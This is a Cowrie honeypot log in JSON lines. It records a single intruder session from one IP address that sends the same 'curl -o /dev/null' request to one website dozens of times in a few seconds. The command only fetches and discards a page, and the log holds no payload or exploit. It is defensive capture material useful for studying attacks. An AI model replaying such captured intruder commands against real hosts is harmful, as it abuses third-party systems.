{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.934543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.975110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.975929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.017268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.018332Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.058447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.059391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.104261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.105088Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.141681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.142861Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.179530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.180366Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.216832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.217660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.270700Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.271785Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.310549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.311493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.348070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.349100Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.386901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.387925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.427474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.428377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.467421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.468489Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.505460Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.506495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.547677Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.548744Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.596629Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.597902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.635468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.636898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.690632Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.691753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.730492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.731730Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.769575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.770440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.810070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.810976Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.851549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.852661Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.895445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.896509Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.936848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.937935Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:08.981699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:08.982625Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.023977Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.024951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.155983Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.157098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.215945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.216852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.253474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.254475Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.388589Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.389909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.503170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.504994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.542035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.543282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.580244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.581224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.619097Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.620200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.657569Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.658699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.697961Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.699423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.736848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.737968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.786451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.787438Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.824416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.825587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:09.862761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:09.863651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.155636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.156772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.203011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.204265Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.241526Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.242684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.283214Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.284136Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.321951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.323038Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.360220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.361169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.398471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.399546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.454348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.455500Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.494516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.495608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.533379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.534546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.572614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.573719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.617922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.618916Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.663196Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.664549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.700950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.701828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.740617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.741510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.778171Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.779319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.816476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.817400Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.865097Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.865986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.905010Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.905892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.948001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.948873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:10.992760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:10.993628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.051301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.052660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.094789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.095888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.139675Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.141757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.181052Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
